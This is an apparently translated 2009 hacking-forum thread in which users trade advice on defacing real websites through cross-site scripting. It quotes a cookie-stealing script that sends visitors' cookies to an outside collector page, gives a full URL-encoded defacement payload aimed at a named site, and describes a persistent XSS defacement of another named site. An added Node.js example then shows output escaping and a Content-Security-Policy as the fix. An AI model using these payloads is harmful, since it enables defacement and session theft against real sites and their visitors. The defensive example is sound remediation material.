dRuNNNk Posted November 7, 2009
Can someone help me with XSS defacement? I don't understand what I need to do. How can I do an XSS defacement without giving the admin <script>document.location="http://siteulmeu.com/cookiestealer.php?cookie=" +document.cookies</script>? Can it be done some other way?

Vlachs Posted November 7, 2009
document.innerHTML

dRuNNNk (Author) Posted November 7, 2009
I understand, but I have this site, serials.ws; if I insert the innerHTML code, nothing happens to it.

1337 Posted November 7, 2009
To deface through XSS, the vulnerability has to be a persistent one (I think?).
It doesn't work on all sites.
On this one, for example, it works:
http://portal-braila.ro/cauta.php?cauta_textul=%3Cscript%3Edocument.body.innerHTML%3D%22%3Cstyle%3Ebody{visibility:hidden;+background:black;}%3C/style%3E%3Cdiv+style%3Dvisibility:visible;%3E%3Ccenter%3E%3Ch1%3E%3Cfont+color%3D'white'%3ENoi+vrem+%3C/font%3E%3Cfont+color%3D'red'%3Erespect+%3C/font%3E%3Cfont+color%3D'white'%3E!%3C/font%3E%3C/h1%3E%3Cbr%3E%3Cimg+src%3D'http://img379.imageshack.us/img379/5761/imagine3km7.png'%3E%3Cbr%3E%3Cobject+width%3D'448'+height%3D'46'%3E%3Cparam+name%3D'movie'+value%3D'http://embed.trilulilu.ro/audio/smbdstopme/e020c0d1cdcfd8.swf'%3E%3C/param%3E%3Cparam+name%3D'allowFullScreen'+value%3D'true'%3E%3C/param%3E%3Cparam+name%3D'allowscriptaccess'+value%3D'always'%3E%3C/param%3E%3Cembed+src%3D'http://embed.trilulilu.ro/audio/smbdstopme/e020c0d1cdcfd8.swf'+type%3D'application/x-shockwave-flash'+allowscriptaccess%3D'always'+allowfullscreen%3D'true'+width%3D'448'+height%3D'46'%3E%3C/embed%3E%3C/object%3E%3Cbr+/%3E%3Cfont+color%3D'white'%3E%3Cb%3ECampanie+sustinuta+de:+xap,+ynneb,+edoknit,+yttif%3C/b%3E%3C/font%3E%3C/center%3E%3C/div%3E%22;%3C/script%3E&nr=0

dRuNNNk (Author) Posted November 7, 2009
Thanks, guys, I've learned something new.

Tazor Posted November 8, 2009
dRuNNNk thinks that if he puts my code into a parameter it will deface serials.ws ... The XSS code has to be displayed on a page in order to be executed by the user's browser.
fcsteaua.ro got defaced when the name of an article was changed to the code above. Those who visited fcsteaua.ro/index.php executed the JavaScript and were shown something else. Is that so hard?
And how did you change the article's name?

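Tazor's point above is that injected markup only matters once the site writes it back into a page that visitors load. As an added example (not from the thread or from any of the sites named), this Node.js sketch shows the corresponding fix, HTML-encoding a stored article title and an echoed `cauta_textul` search term at output time; the function names and the sample title are constructed for illustration.

```javascript
// Added example (constructed): encode untrusted text when it is written into HTML.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable form: the stored title is pasted into the markup verbatim, so a
// title that contains a <script> element runs in every visitor's browser.
function renderArticleUnsafe(article) {
  return `<h2>${article.title}</h2>`;
}

// Hardened form: the same title is encoded at output time and shows as text.
function renderArticleSafe(article) {
  return `<h2>${escapeHtml(article.title)}</h2>`;
}

// Reflected case: a search page echoing its cauta_textul parameter.
function renderSearchSafe(queryString) {
  const term = new URLSearchParams(queryString).get('cauta_textul') || '';
  return `<p>Results for "${escapeHtml(term)}"</p>`;
}

// Crude check used below: does the rendered HTML still contain a live <script> tag?
function hasLiveScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Defence in depth: this policy stops inline <script> blocks from running
// even if an encoding call is missed somewhere.
function securityHeaders() {
  return { 'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'" };
}

// Constructed sample: a stored title shaped like the payload in the thread.
const sample = { title: '<script>document.body.innerHTML="replaced"</script>' };
console.log('unsafe render has live script:', hasLiveScriptTag(renderArticleUnsafe(sample)));
console.log('safe render has live script:', hasLiveScriptTag(renderArticleSafe(sample)));
console.log(renderSearchSafe('cauta_textul=%3Cb%3Ehi%3C%2Fb%3E&nr=0'));
```
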
Vlachs Posted November 9, 2009
And how did you change the article's name?
kw3, look, here is material for a warning, and yet you give one to me.